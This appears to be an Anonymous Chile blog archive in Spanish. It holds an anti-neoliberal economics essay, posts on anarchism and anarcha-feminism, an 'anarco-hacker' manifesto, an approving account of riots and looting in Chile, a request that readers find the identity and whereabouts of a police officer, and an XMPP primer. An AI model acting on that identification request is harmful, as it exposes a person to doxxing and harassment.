El argumentario de tal dogma carece de credibilidad, pues cada uno de sus predicamentos son falseados por la evidencia empírica existente. Vayamos punto por punto, comenzando con la supuesta reducción del gasto público que nunca se materializó. Así en Estados Unidos, el gasto público, medido como porcentaje del PIB, o per cápita, ha aumentado considerablemente desde 1980 a 2003, pasando a representar del 34% del PIB en 1980, al 37% del PIB en 2003, mientras que por per cápita subió de US$4,148 per cápita a US$13,750 durante el mismo periodo. Un tanto parecido ha ocurrido en cuanto a impuestos. En Estados Unidos impuestos como porcentaje del PIB paso de representar el 35% en 1980, a un 39 % del PIB en el 2003. En realidad, tales hechos ocurrieron ya en los años del gobierno del presidente Reagan. El gasto público federal subió durante su mandato, del 21.6% de PIB al principio de su mandato, al 23% al final. Y lo que sorprenderá a muchos lectores es que Reagan fue el presidente de Estados Unidos que subió los impuestos del mayor porcentaje de la población estadounidense en tiempo de paz después de la Segunda Guerra Mundial. Reagan bajó, y mucho, los impuestos del 20% del nivel de renta superior de la población de Estados Unidos. Pero los incrementó, y mucho, al resto de la población.

Un tanto igual ocurrió con su supuesta reducción del gasto público: recortó mucho el gasto público social, bajándolo del 38 % del gasto federal al 32 %. Pero aumentó enormemente el gasto público en dos capítulos que nunca citó: el gasto militar (que pasó de representar el 41% de todo el gasto público federal, al 45%), y los subsidios y ayudas a empresas privadas que pasaron de representar del 21 al 23%. Como bien señaló John Williamson, el ideólogo del consenso neoliberal de Washington «tenemos que recordar qué lo que el gobierno de los Estados Unidos promueve en él exterior, no lo realiza en el interior» (G. Williamson, What Washington means by policy reform, Institute for International Economics, Washington D.C., 1990).

Es importante demostrar la falsedad del discurso supuestamente anti-estado del pensamiento liberal. Pues el tema no es Estado o no Estado, si no quien controla el Estado, y para qué objetivos. El Estado, durante el periodo neoliberal, aumentó su intervencionismo para aumentar los intereses del capital a costa de los intereses del mundo de trabajo, y los datos no pueden ser más convincentes. Y esto ocurrió a los dos lados del Atlántico Norte, resultado de la aplicación de tales políticas neoliberales, cuando vimos, durante todo el periodo neoliberal, un descenso muy marcado de las rentas de trabajo como porcentaje del total de las rentas a consta de un aumento muy notable de las rentas del capital. Los datos hablan por sí mismos. Tal porcentaje de las rentas de trabajo bajaron como promedio en los países que más tarde serían llamados «la Unión Europea de los 15», pasando de un 72.4% de todas las rentas a finales de los años 70 a un 66.5% en el año 2012. Durante el mismo periodo, en Estados Unidos, pasaron del 70 % al 63.6%, y en España de un 72.4% a un 58.4% (ahí es donde descendió más). En el Reino Unido de un 74.3% a un 72.7%. En Italia, de un 72.2% a un 64.4%. En Francia de un 74.3 % a un 68.2 %. Y en Alemania de un 70% a un 74%.

Estas políticas neoliberales causaron la gran recesión económica

Era fácil de predecir y así lo hicimos algunos, que este descenso tan marcado en las rentas de trabajo (derivadas primordialmente de los salarios), crearían un descenso de la capacidad adquisitiva de la población al reducirse la demanda doméstica. Y así ocurrió. Y como consecuencia la tasa de crecimiento económico disminuyó. Ahora bien, dos hechos ocurrieron que frenaron el descenso de tal crecimiento. Uno fue el gran estímulo económico que experimentó Alemania consecuencia de la aplicación de políticas públicas expansivas a fin de facilitar la integración de las dos Alemanias, la Alemania del Este y la Alemania del Oeste, realizada a costa de una gran inversión pública en la Alemania Oriental. Esto significó un enorme aumento del gasto público alemán. El Estado alemán pasó de estar en un superávit de 0,1% del PIB en 1989, a un déficit público equivalente un 3,4% del PIB en 1996. Tal crecimiento de la inversión pública significó un gran estímulo a la economía alemana. Y debido a su centralidad en la economía europea, a esta última también.

El crecimiento del capital financiero y el origen de la crisis financiera

La otra causa de que el crecimiento económico no bajara tanto (como consecuencia de la disminución tan marcada de las rentas del trabajo), como se esperaba (aunque fuera menor que en el periodo 1945-1980), fue el enorme endeudamiento que originó el gran crecimiento del capital financiero. La bajada de los salarios y de la capacidad adquisitiva de la población forzó a que la gente se endeudara. Pero tal crecimiento del capital financiero fue acompañado de un gran aumento de la inversión financiera especulativa debida a la baja rentabilidad que existía en la economía productiva, una consecuencia a su vez de la caída de la demanda doméstica. Y esa actividad especulativa de alto riesgo, llevó a las burbujas, muy en especial a la inmobiliaria, que temporalmente creó una sensación de falsa euforia hasta que explotó. Fue en este momento de gran euforia que el Presidente Aznar de España, subrayó que «España iba bien«, a lo cual Jordi Pujol, Presidente de la Generalitat de Cataluña, añadió que «Cataluña iba incluso mejor«. Y como siempre ocurre en España, en medio de esta falsa euforia, apareció de nuevo, la propuesta de bajar impuestos, la respuesta predecible de las fuerzas políticas conservadoras neoliberales (PP y CiU) en España (incluyendo Cataluña). Lo que era nuevo en esta situación, menos predecible, es que fueran también los socialistas, presididos por el señor Zapatero, los que añadieran también su voz a bajar los impuestos. Como anunció el Presidente Zapatero: «bajar impuestos es de izquierdas«. Y así lo hizo, en 2006, cuando bajo el IRPF, y el impuesto de sociedades, con el apoyo, como era predecible de Convergencia y Unión. Consecuencia de la bajada de impuestos, los ingresos del Estado bajaron al año siguiente (del 2007 al 2008), 27.223 millones de Euros, consecuencia de la reforma tributaria realizada un año antes. Según las cifras del propio Estado, sé reconoció que el 72% de esta cantidad se debió al recorte de impuestos y solo el 28% al descenso de la actividad económica (ref. informe de recaudación tributaria del año 2008, elaborado por el Servicio de Estudios Tributarios y Estadísticas del Ministerio de Economía y Hacienda).

La nefasta política de recortes

Cuando el agujero en los ingresos del Estado apareció con toda nitidez en el 2007, se asumió erróneamente que ello se debía al exceso del gasto público, cuando en realidad, el Estado español tenía superávit, y la deuda pública era la más baja de la eurozona. Y era basada en esta errónea lectura de la realidad, que el inicio de recortes del gasto público social tomó lugar. Zapatero congeló las pensiones para conseguir 1,200 millones de euros. En realidad, habría podido conseguir incluso mucho más dinero, manteniendo el impuesto de patrimonio, 2,100 millones de euros, o revirtiendo la rebajada de impuestos de sucesiones (2,552 millones de euros), o revirtiendo la bajada de impuestos sobre las personas que ingresaban mas de 120,000 euros al año (2,500 millones). El Presidente Rajoy, incluso recortó mucho más, 25,000 millones de euros en sanidad, educación y servicios sociales. De nuevo, habría podido conseguir incluso más dinero corrigiendo el fraude fiscal de las grandes fortunas, de la banca y de las grandes empresas que representan el 71% del fraude fiscal, 44,000 millones de euros. Y un tanto igual ocurrió en Cataluña. Los gobiernos de Artur Mas del 2010 al 2016, y el gobierno Puigdemont del 2016 al 2017, recortaron 626 millones en educación pública, 1,027 millones en sanidad, 336 millones en vivienda, 149 millones en protección social, etc. En realidad, Cataluña fue una de las Comunidades Autónomas que aplicaron con mayor dureza las políticas neoliberales de recortes, siendo una de las que tiene un gasto público social, en sanidad, en educción y servicios sociales más bajos de España. Juan Torres, Alberto Garzón y Vicenç Navarro, escribieron un libro: Hay alternativas – Propuestas para crear empleo y bienestar en España, en el que documenta que por cada recorte de gasto público que se hizo, había otras alternativas, probando con ello la falsedad de aquel argumento de que no había alternativas. Si que las había. Pero no había la voluntad política para así hacerlas. Ello explica que el movimiento de protesta 15M utilizara dicho libro para mostrar la falsedad de tal argumento.

El elevado coste humano del neoliberalismo

La reducción del nivel de vida de las clases populares y el descenso de su protección social y de los servicios públicos del Estado de Bienestar (como se ha visto durante la pandemia), produjo un aumento de la mortalidad de las enfermedades atribuibles al deterioro del bienestar y la calidad de vida de la población (deseases of despair), responsable de un aumento de la mortalidad en amplios sectores de las clases populares con notable aumento de las desigualdades en la esperanza de vida entre las clases sociales en la mayoría de los países en los dos lados del Atlántico Norte, y con especial intensidad en los países del sur de Europa, donde las izquierdas han sido históricamente débiles y el neoliberalismo ha sido ampliamente promocionado por el Estado. No es por lo tanto es sorprendente que España (y Cataluña dentro de esta), sea uno de los países europeos con mayor mortalidad por COVID-19 acumulada desde el principio de la pandemia.

El enorme descrédito del neoliberalismo

A modo de ejemplo, como consecuencia del enorme poder que las fuerzas conservadoras liberales han tenido, España se ha gastado siempre en su Estado de Bienestar menos de lo que debería gastarse por el nivel de desarrollo económico que tiene. Una estimación conservadora de tal déficit es la de que España debería gastarse al menos 66.000 millones de euros más, adicionales a los que se financia en su Estado de Bienestar. Su crónico subdesarrollado Estado de Bienestar ha sido consecuencia de ello. Un tanto igual ocurre en cuanto al nivel salarial y el nivel de ocupación y la solución requiere un cambio muy notable de políticas fiscales excesivamente dependiente de la grabación de las rentas de trabajo a costa de la baja grabación de las rentas de capital, entre otras características regresivas de su política fiscal. En este aspecto es positivo que el enorme descrédito que tiene hoy el neoliberalismo, (incluso en círculos y fórums que en su día lo promocionaron como el Fondo Monetario Internacional), que explica los cambios ocurridos incluso en el establishment de la Unión Europea. Ahora bien, existe el peligro que, una vez controlada la pandemia, si inicie de nuevo la aparición de nuevas versiones del neoliberalismo, promovidas por las voces próximas a los establishments económicos y financieros que ejercen enorme influencia sobre las instituciones representativas y mediáticas del país.

[VÍDEO] Lo Prado en Llamas

Publicada el 23/06/2021 por Anonymous Chile

Desde Lo Prado, hemos compilado en este material diferentes acciones que se desarrollaron en nuestra comuna -como en otras- desde el inicio de la revuelta el día 18 de octubre de 2019 hasta el 18 de marzo de 2020. También, hemos incluido un anexo sobre la continuidad de los hechos de violencia política desde el anuncio del Estado de Catástrofe hasta la conmemoración anual de la revuelta en medio de la pandemia por Covid-19.

Las acciones registradas por anónimxs, y otras tomadas desde distintos sitios, se desarrollaron sin líderes, sin dirigentes ni partidos políticos. Estas van desde barricadas incendiarias, propaganda, velatones, cicletadas, actividades autogestionadas, participación de instancias amplias, manifestaciones territoriales que culminaron con fuertes disturbios, enfrentamientos contra fuerzas policiales y fuerzas militares hasta saqueos a tiendas variadas.

La revuelta iniciada en octubre, junto a todos los momentos de rabia e ilusiones, debe seguir siendo validada y defendida por todxs quienes continúan manifestándose en el aquí y ahora contra el poder y sus defensorxs. Es por eso que creamos esto -para contribuir a la lucha- a la memoria y acción histórica de nuestra comuna/barrio/villa/población, en definitiva, este es un humilde aporte que presentamos ahora.

P.D.: Dedicamos este material audiovisual artesanal a cada presx, cada profugx, a cada heridx, mutiladx y fallecidx por luchar bajo el contexto de violencia política desatada durante la revuelta y en tiempos de pandemia. Y, por último, con mucho cariño a quienes continúan en las calles, en especial a lxs vecinxs organizadxs de la zona norponiente de Santiago de Chile

[VÍDEO] Estructuralismo, post-estructuralismo y anarquismo

Publicada el 23/06/2021 por Anonymous Chile

Por su importancia para el anarquismo, recordamos diferentes corrientes de pensamiento; el estructuralismo, que vivió su auge en los años 50 y 60 del siglo XX, y el postestructuralismo, nacido en gran medida a partir de Mayo del 68, que resulta primordial para comprender la sociedad posmoderna.

[VÍDEO] Propuestas económicas del anarquismo clásico: Mutualismo y Colectivismo

Publicada el 23/06/2021 por Anonymous Chile

Mutualismo

Uno de los pilares del anarquismo de Proudhon se asienta en el mutualismo, basado en sus experiencias directas con la clase trabajadora con el objetivo de adelantar un futuro de bienestar y justicia social; puede considerarse como la primera escuela económica anarquista, y así se reflejará en los seguidores de Proudhon en la Primera Internacional; según esta teoría, el Estado será sustituido por la organización de individuos según acuerdos voluntarios sobre una base de igualdad y reciprocidad.

Un factor primordial en el mutualismo es la solidaridad, algo que le separa del individualismo meramente egoísta, que busca la satisfacción personal; el federalismo, de aspiraciones universales, es otro de los pilares sobre los que se asienta el pensamiento proudhoniano. Según el mutualismo, la sociedad sería un sistema de equilibrio entre fuerzas libres, garantizado por la obtención de derechos y el cumplimiento de deberes (servicio por servicio, producto por producto, préstamo por préstamo…); el socialismo de Proudhon, en lugar de basarse en la unidad y en la síntesis (algo que él identificaba con el centralismo comunista), lo hace en una pluralidad basada en el equilibrio, la cooperación, el intercambio y la independencia de las partes.

Colectivismo

El colectivismo, que tiene en Bakunin su origen, renunciaba al comunismo, ya que lo identificaba, seguramente y de manera exclusiva, con el marxismo por cuartelario, por anular la libertad individual; proponía el derecho del productor a la propiedad de los bienes de consumo, un garante de la libertad individual. El programa colectivista de Bakunin se basaba en la propiedad colectiva de la tierras, fábricas y talleres, por parte de los miembros de cada grupo productor, en la autogestión de cada grupo y en la federación de los mismos entre sí para coordinar metas e intercambios.

[VÍDEO] Propuestas económicas del anarquismo clásico: Comunismo Libertario

Publicada el 23/06/2021 - 23/06/2021 por Anonymous Chile

El comunismo libertario, considerado una evolución dentro del ideal libertario, consideraba que la revolución social, con la abundancia productiva que conllevaría, haría innecesaria también la propiedad de los útiles de consumo. Aunque hay diversos precedentes cercanos al comunismo libertario, es Piotr Kropotkin el teórico más importante del mismo, tal y como lo expone en obras como ‘Campos, fábricas y talleres’ o ‘La conquista del pan’.

Kropotkin reivindica el esfuerzo colectivo que ha dado lugar a grandes logros en la civilización. Existen personalidades individuales que han creado grandes cosas para disfrute de la humanidad, aunque no dejan de ser aquéllos también hijos de la industria y, por lo tanto, de la labor de infinidad de obreros que la han desarrollado. Todo lo creado lo ha sido por el esfuerzo combinado de generaciones pasadas y presentes; a pesar de ello, la apropiación por parte de unos pocos de todo lo que incremente la producción no ha dejado de ocurrir. Es por eso que Kropotkin critica una economía que no beneficia a toda la humanidad, y ya hace tantos años denuncia a un capitalismo también por unas crisis cíclicas que dejan sin trabajo a cientos de miles de personas. La educación y el progreso moral se producen de manera estrechamente vinculada al desarrollo económico y a la justicia social, es decir, libre disfrute de cada persona de la riqueza.

 

Anarquismo y feminismo

Publicada el 23/06/2021 - 23/06/2021 por Anonymous Chile

“Cuidado con las mujeres, cuando se sienten asqueadas de todo lo que las rodea y se sublevan contra el mundo viejo. Ese día nacerá el nuevo mundo”.

Louise Michel

Y aquí nos encontramos, asqueadas de todo lo que nos rodea y dispuestas a apuntar a la raíz de los problemas de opresión, tanto de sexo como de clase, así como de cualquier otra índole, porque deseamos el porvenir y la liberación de nuestra especie, que hoy en día parece estar empeñada en cavar su propia tumba y en destruir el instinto de supervivencia que como seres vivos poseemos.

Actualmente podemos observar cómo florecen muchos colectivos y proyectos de mujeres (y con ello una nueva ola del feminismo), debido a que cada vez más mujeres son conscientes de las opresiones que viven por pertenecer a un determinado sexo, y sin duda, en gran parte gracias a mujeres que, reconociéndose o no como feministas, lucharon e hicieron divulgación por la liberación de la mujer.

Nosotras, como Louise Michel, afirmamos que el día que las mujeres se subleven contra toda opresión, ese día nuestra última Moira; Átropos cortará el hilo del viejo mundo, para dejar paso a una humanidad más libre.

Y pensamos que para que esto se lleve a término, necesitamos del feminismo y del anarquismo mutuamente, en plena simbiosis, y aunque este último sea la lucha contra todas las opresiones, por características propias del momento en que nació, (dentro del movimiento obrero y de la familia del socialismo) se ha centrado más en la lucha de clases y en ir contra el Estado.

Es cierto que el anarquismo en sí lucha contra toda opresión, sea de la raíz que sea, pero como hemos ya nombrado, por el entorno y características en las que se ha desarrollado, ha antepuesto la lucha de clases y antiestatista sobre toda otra. Esto no quiere decir que neguemos la importancia de la lucha de clases y antiestatal. Creemos que son imprescindibles para un nuevo mundo, y que la lucha anarcosindicalista es el motor para acabar con el capitalismo y las clases sociales, pero también pensamos que la lucha de la mujer no es menos importante. Nosotras, somos sujetos de una doble explotación por clase y por sexo, y no podemos olvidarnos de esta última por miedo de perder un horizonte. Horizonte miope si no es capaz de ver las demás opresiones, porque, aunque se disolviese el Estado y las clases sociales, si no tratamos todas las actitudes patriarcales y opresiones hacia la mujer, seguiría quedando sexismo y, por tanto, opresión.

Las mujeres trabajadoras, estamos y estaremos siempre en desventaja frente a los hombres de nuestra misma clase en el capitalismo, debido en parte a la biología reproductiva femenina; en concreto, a la capacidad de parir, que en un mundo competitivo involucra que a las mujeres se nos vea menos productivas para los beneficios del capital, al necesitar unos meses por el parto, la lactancia, etc. Y viéndonos perjudicadas por un sistema que atenta contra la libre elección de la maternidad, al tener que postergar la maternidad (si es que se desea) si quiere una formarse y hacerse un hueco en cualquier profesión. Esta discriminación de la mujer a partir del hecho biológico de la capacidad de gestar y concebir, implica una serie de convenciones culturales que nos van a afectar a todas las mujeres, seamos o no capaces de gestar. A todas se nos van a atribuir unos roles asociados tradicionalmente a la maternidad, es decir, se nos va a destinar a determinadas funciones culturalmente definidas como “femeninas”, y todas vamos a sufrir marginación y violencia en todos los planos: laboral, social, sexual, cultural, político, etc… A la vez que se establece la heteronormatividad, como derivación de la cosmovisión patriarcal, como otra forma de anulación de la diversidad sexual, una negación que a todas las mujeres nos viene a afectar en nuestra libertad y nos puede suponer una doble marginación.

Los trabajos más precarizados también son los más feminizados (como son los trabajos de cuidados), y la desigualdad en los salarios es aún existente. La mujer trabajadora suele estar más precarizada que el hombre trabajador, y es algo que no se puede olvidar y callar, el silencio invisibiliza que la mujer sufre una doble explotación. Y no podemos olvidar que es esta precarización la que la lleva a ser prostituida, siendo esto también un atentado contra el amor libre y contra la integridad física y mental de la mujer. Pero la mujer, no solo sufre una serie de desigualdades con el hombre de su misma clase respecto a la economía. Y aún disuelto el Capitalismo y el Estado, si hoy no se trabajan las actitudes y costumbres patriarcales, seguirá existiendo una opresión hacia una gran parte de la población del planeta.

El sexismo es muy antiguo, puede que incluso más que las clases sociales, como dice Deidre Hogan (amparándose en artículos de la antropóloga Rayna R.Reiter): “ El sexismo es posiblemente la forma de opresión más temprana que existió, no solo precede al capitalismo; sino que hay evidencia que el sexismo también precedió a formas más tempranas de la sociedad de clases.”

Esto es importante para entender que necesitamos también poner nuestro ojo sobre él, y recordar el principio libertario de que “los medios hacen el fin”, dejar de trabajar hoy aspectos tan arraigados a lo largo de la historia no pueden sino perjudicar a la labor del anarquismo.

Por todo lo expuesto, el anarquismo necesita al feminismo, ya que ha dejado en segundo plano la lucha contra la opresión de la mujer. Además, el anarquismo como casi todas las ideologías y disciplinas ha sido trabajado mayoritariamente desde un punto de vista masculino (androcentrismo). El feminismo por ello puede aportar mucho al anarquismo, aportando el trabajo y conocimiento de muchísimas mujeres que han luchado y luchan por la liberación de la mujer (y humana).

Sabemos que existe un cierto miedo a que mirar desde más frentes pueda llevar a una división de la lucha, pero las aquí presentes no lo entendemos así, es más, pensamos al contrario. Que existan como en su día organizaciones y colectivos que trabajen otros frentes es importante, y más que preocuparnos por una posible división de tendencias y una pérdida de un enfoque genérico (en verdad la pérdida de enfoque genérico es no tratar lo suficiente otros temas de opresión), deberíamos preocuparnos por propiciar los diferentes vértices del movimiento libertario como existía hace casi 100 años (ateneos, CNT, MMLL, FIJL…). Trabajar en que éstos no se dejen engañar por los nuevos ataques del Capital, del Estado y del Patriarcado y generar redes entre todos ellos.

Cabría además preguntarse si este miedo no tiene raíces patriarcales. ¿Por qué no se pone en duda las juventudes libertarias? ¿Por qué solo a la mujer se le pide que no se centre demasiado en sus opresiones, y se insiste en que todos sus problemas provienen de las clases? ¿Por qué siguen los hombres diciéndonos qué luchas son prioritarias? ¿Son prioritarias solo las luchas que les afectan a ellos?

Los colectivos específicos como Mujeres Libres con un carácter profundamente anárquico, ayudan a que el anarquismo avance, a que lleguen a él muchas más mujeres, y a combatir contra más autoritarismos que se disfrazan y que debido a su naturalización es difícil identificarlos.

Es cierto que hay “feminismos”, que actualmente tienen tintes liberales y que algunos de ellos se disfrazan incluso de libertarios (como los que aceptan la prostitución como un empoderamiento de la mujer). Es cierto que hoy casi en todas las ideologías hay quienes dicen ser “feministas” (también decían los fascistas que eran socialistas, es algo normal cuando unas ideas calan en la sociedad y todas quieren sacar tajada) pero las anarquistas y los anarquistas deberíamos tener en cuenta que esto son ataques del patriarcado y que es importante que esas mujeres feministas que empiezan a moverse y escuchar sus cadenas, puedan ir más allá, no podemos darles la espalda.

Y aunque no nos vamos a centrar aquí en hablar de otros “feminismos” (ya tendremos tiempo) si es importante decir que nosotras como feministas anarquistas no pretendemos un empoderamiento, deseamos la liberación de la mujer y la humanidad.

Pero no solo el anarquismo necesita del feminismo, también a la inversa. El feminismo necesita partir del anarquismo, por coherencia con la libertad total y con la libertad de la mujer.

Sin él, estará sentenciado a la muerte, pasará de ser un movimiento social y de estar en las calles a la institucionalización con todo lo que conlleva la vieja política masculina, pasará de creer que las mujeres deben tomar las riendas de sus vidas a delegar y ser absorbido por partidos políticos de toda índole, que llevarán a una desmovilización y delegacionismo, y a perpetuar el Patriarcado, el Estado y el Capital.

Las mujeres no deben dejarse engañar por los partidos, el Estado nunca podrá dar lo que piden las feministas; la abolición del patriarcado y de la jerarquía del hombre sobre la mujer, primero porque el Estado ha ido ligado desde sus inicios al Patriarcado para instaurarse y mantenerse y por otra parte porque con él siempre existirán las clases sociales. Las pequeñas migajas que pueden permitirse no son suficientes para abolir la opresión y solo sirven para mantener las raíces de las opresiones.

El feminismo sin el anarquismo es contradictorio y puede llevar a caer en los “mismos errores” masculinos. Como bien decía Mujeres Libres: “La política pretende ser el arte de gobernar a los pueblos. Acaso sea esto en el terreno de las definiciones abstractas; pero en la realidad, en esa realidad que sufrimos en nuestra carne, la política es la podredumbre que corroe el mundo. Política es como decir poder, y donde hay poder hay esclavitud, que es relajamiento y miseria moral”.

Esto son los “errores” cometidos durante siglos por los hombres, si vamos hacia la libertad, no podemos caer en las mismas conductas autoritarias y emplear sus mismos entes.

 

Extraído desde: La madeja
Más información en: Grupo Moiras

Manifiesto Anarco-Hacker

Publicada el 22/07/2020 - 11/07/2021 por Anonymous Chile

Somos hackers, somos anarquistas, somos curiosos.

Nos gusta conocer como funcionan las cosas. Nos gusta inventar, modificar y mejorar la tecnología como a cualquier otro hacker. Lo hacemos sin ánimo de lucro. Como hackers lo hacemos por el conocimiento y para satisfacer nuestra curiosidad, y hemos decidido utilizar esto como medio para crear un mundo mejor. La mayor parte de nosotros eramos rebeldes en la escuela, y probablemente nos metiéramos en problemas más de una vez. Crecimos y vimos al sistema como nuestro enemigo. Eramos bienvenidos en grupos de hackers pero en muchos casos tenían una limitada visión política y seguían repitiendo la misma propaganda del sistema de siempre. El resto de hackers que conocíamos se pensaban que estábamos locos cuando nos uníamos a las protestas en las calles y cuando leíamos a Bakunin, de Cleyre, Marsh y otros teóricos políticos.

Mientras nosotros estábamos en las revueltas de Seattle, Genova, Berlin, Atenas y Toronto aprendiendo quien es el verdadero enemigo de los derechos y libertades, nos dimos cuenta de que no es solo el gobierno, sino el capitalismo, la religión, la raza, el género, el nacionalismo, el imperialismo, el patriarcado, etc. Ellos son nuestro enemigo. Con el tiempo nos convertimos en los primeros hacktivistas y formamos colectivos hacker con valores anarquistas como actuación consensuada, democracia directa, organización horizontal, colaboración masiva y modelos de decisión federada y/o descentralizada. Escribimos herramientas de seguridad, guías, tormentas de datos con el objetivo de ayudar a los disidentes alrededor del mundo y a aquellos atrapados en las mismas estructuras y fronteras de los estados. Pensábamos que no era suficiente así que creamos frentes online de hacktivistas, algunos de los cuales siguen creciendo hoy en día, y participamos en sus acciones. También observamos una falta de experiencia política en los recién llegados así que decidimos centrar esfuerzos en educación y en trabajar una mente crítica.

Estamos cansados de ser víctimas sin luchar, cansados de tener las habilidades y no darles un uso adecuado, y para nosotros un buen uso no es trabajar para vosotros y vuestros perros. Ahora que hemos evolucionado somos la insurgencia. Nos tenéis miedo. Utilizáis vuestros estados y vuestros medios de comunicación para inventaros más propaganda y criminalizar a nuestros compañeros alrededor del mundo, mintiendo sobre los luchadores por la libertad, haciéndonos parecer el enemigo, impotente o perdido, pero ahora es diferente. Ahora somos legión. Nuestras barricadas no solo son electrónicas, y tener por seguro que tenemos más habilidad que cualquiera de vuestros perros “buscafortunas” que habéis convencido para que trabajen a vuestro servicio. Incluso ahora, algunos de los nuestros trabajan para vosotros y contra vosotros.

No enviamos información sobre nuestras acciones a vuestros medios de comunicación, las mantenemos para nosotros, sabéis quienes somos, sabéis que no estamos dispuestos a gobernar por celebridad, ni capital, y esto es lo que os asusta. Estamos decididos a derribar vuestro sistema ladrillo a ladrillo y byte a byte, desde dentro y desde fuera hemos tenido éxito hasta ahora. All your bases are belong to us. Y a todos aquellos que suplicáis por la libertad, liberaros vosotros mismos. Un perro que suplica nunca será libre de su amo.

La información debe ser libre pues aquellos que poseen la información y controlan su acceso tienen el poder. Por eso debemos liberarla y descentralizar ese poder.

Concebimos todas las formas de resistencia digital, y las usamos para mostrarles al mundo que podemos ganar todas estas batallas y más, por eso hemos decidido no separarnos de nuestros compañeros anarquistas con otras tácticas, sino juntarnos todos, no nos conformamos con un solo frente, los cubrimos todos. ¡Llevamos a la gente a la calle y traemos al mundo electrónico a activistas que no podrían haberlo hecho antes de aumentar nuestro número! ¡Diversidad de tácticas y diversidad de frentes!

En nuestra opinión todo individuo que, en cualquier estado actual, predica con la urna electoral, está perdiendo el tiempo y perpetuando un criminal estado capitalista. Preferimos contribuir en este nuevo mundo con un espíritu basado en ideales anarquistas y colaboración masiva. Para ello, la mayor parte de nosotros creemos en diferentes estrategias, no solo trabajar desde sombra de las redes más oscuras, sino también en las calles y comunidades con movimientos insurgentes de todo tipo.

Nuestra insurgencia utiliza una diversa colección de acciones dependiendo de lo que cada uno de nosotros decida que es necesario y somos capaces de en ese mismo instante, trabajar juntos en lo que mejor se nos da.

Nosotros somos idealistas,

Nosotros escribimos,

Nosotros amamos,

Nosotros construimos,

Nosotros creamos,

Nosotros destruimos,

Nosotros emancipamos,

Nosotros compartimos y

Nosotros luchamos contra la opresión en cualquiera de sus formas. Y por supuesto, Nosotros hackeamos.

[MÁXIMA DIFUSIÓN] Carabineros de Chile golpea mujeres inocentes en plena vía pública

Publicada el 22/07/2020 - 03/08/2021 por Anonymous Chile

El día de hoy, Anonymous Chile ha sido receptor de un impactante y polémico hecho, ocurrido en la localidad de Curacaví, perteneciente a la Provincia de Melipilla en la Región Metropolitana, que fue retratado en un contenido audiovisual en el que se detalla cómo un oficial de las fuerzas de la ley, perteneciente a la 63° Comisaría de la institución Carabineros de Chile ubicada en Ambrosio O’Higgins 2211 de la misma susodicha localidad, ha arremetido físicamente de una forma cruél y despiadada con una brutalidad incontenible y descontrolada contra mujeres inocentes. El material es escaso y la información que le acompaña aún más, pero estamos investigando para encontrar al culpable y responsable de tan lamentables actos.

https://anonchile.noblogs.org/files/2020/07/video_2020-07-22_06-01-00.mp4

De antemano, agradeceríamos encarecidamente a quien nos ayude a difundir lo presenciado, y si encuentra, obtiene o consigue algo más referente a la identidad del responsable involucrado o cómo hallarle, favor de compartirlo en los comentarios o mediante nuestras redes sociales.

Saludos cordiales.

Comunicaciones seguras y descentralizadas en Jabber/XMPP

Publicada el 18/07/2020 - 06/10/2021 por Anonymous Chile

En el mes de agosto del año 1988 un finlandés profesional de las Tecnologías de la Información de la Universidad de Oulu llamado Jarkko Oikarinen codificó lo que fue durante mucho tiempo y hasta la actualidad uno de los medios de comunicación instantánea más estables en la historia del Internet, el IRC (Internet Relay Chat), como un reemplazo al programa MUT (MultiUser Talk) en el BBS (Bulletin Board System) de OuluBox.

IRC ofrece comunicaciones rápidas, accesibles y sencillas permitiendo interactuar con otrxs usuarixs tanto por salas grupales como privadas en una red centralizada. Los años pasaron y el IRC creció a una velocidad vertiginosa expandiéndose por todo Internet, alcanzando ciudades de todos los países del mundo, colonizando todo tipo de comunidades y siendo utilizado por muchas agrupaciones en múltiples contextos, circunstancias y ambientes diferentes, pero muy pronto los problemas no tardaron en aparecer llegando a una falencia crucial en su estructura y modo de funcionamiento de IRC: la seguridad. La primera dificultad de IRC fue cómo cifrar y proteger las comunicaciones y mensajes enviados contra ciberataques y, aunque toda la red sea pirateada, la confidencialidad y seguridad de la información no se vean comprometidas o vulneradas de ninguna forma.

Con el tiempo muchos clientes propusieron soluciones en forma de complementos o extensiones que se instalaban, habilitaban o activaban para cifrar los mensajes de extremo a extremo utilizando múltiples algoritmos, mientras que se desarrollaban mejoras al protocolo que eventualmente en teoría permitirían gestionar identidades como en PGP/GnuPG mediante el uso de llaves RSA para verificar la autenticidad de los mensajes, pero esto solamente funcionaba en conversaciones privadas, porque en las grupales, debido al protocolo mismo de IRC, era absolutamente ilógico e irracional conseguir tal cosa y aún no existía una manera viable de asegurar la confidencialidad y seguridad de la información y mensajes enviados en caso de que los servidores IRC que gestionaban y alojaban la red así como también los ordenadores y clientes de lxs usuarixs fuesen comprometidos. Por otro lado se encontraba el problema de que dichos servidores IRC necesitaban registrar datos de la conexión y el equipo de cada usuarix para permitir muchas funcionalidades que se incorporaban y añadían a medida que avanzaba y se mejoraba el protocolo, entonces tanto administradorxs y operadorxs de la red como lxs programadorxs de cada cliente y desarrolladorxs del protocolo mismo debían pensar y trabajar mucho para conseguir que esta información se encuentre cifrada o protegida de alguna forma evitando que caiga en manos equivocadas de desconocidxs o personajes malintencionadxs. Y todo esto es porque IRC se diseñó para comunicar personas en Internet, no para ser seguro.

En 1998, 10 años después, un programador llamado Jeremie Miller comenzó el proyecto Jabber, que fue liberado de manera estable en el 2000 y más tarde cambió de nombre a XMPP llegando a ser la respuesta «segura» a IRC. XMPP es un protocolo de comunicaciones y mensajería instantánea abierto, libre, transparente y descentralizado que permite el empoderamiento y autonomía digital comunicando personas desde múltiples nodos con E2EE utilizando OTR (Off The Record) (NO RECOMENDADO, SE ENCUENTRA OBSOLETO Y FUERA DE TODO USO) u OMEMO, ambos reconocidos algoritmos de cifrado en mensajería instantánea.

Ventajas de XMPP

  • Descentralización: La arquitectura de las redes XMPP es similar a la del correo electrónico; cualquiera puede poner en marcha su propio servidor XMPP, sin que haya ningún servidor central.
  • Estándares abiertos: La Internet Engineering Task Force ha formalizado el protocolo XMPP como una tecnología de mensajería instantánea estándar, y sus especificaciones han sido publicadas como los RFC 3920 y RFC 3921. El desarrollo de esta tecnología no está ligado a ninguna empresa en concreto y no requiere el pago de regalías.
  • Seguridad: Los servidores XMPP pueden estar aislados de la red pública XMPP, y poseen robustos sistemas de seguridad (como SASL y TLS). Para apoyar la utilización de los sistemas de cifrado, la Jabber/XMPP Software & Standards Foundation pone a disposición de los administradores de servidores XMPP Autoridad de certificación en el Observatorio de Mensajería Instantánea ofreciendo certificados digitales gratis.
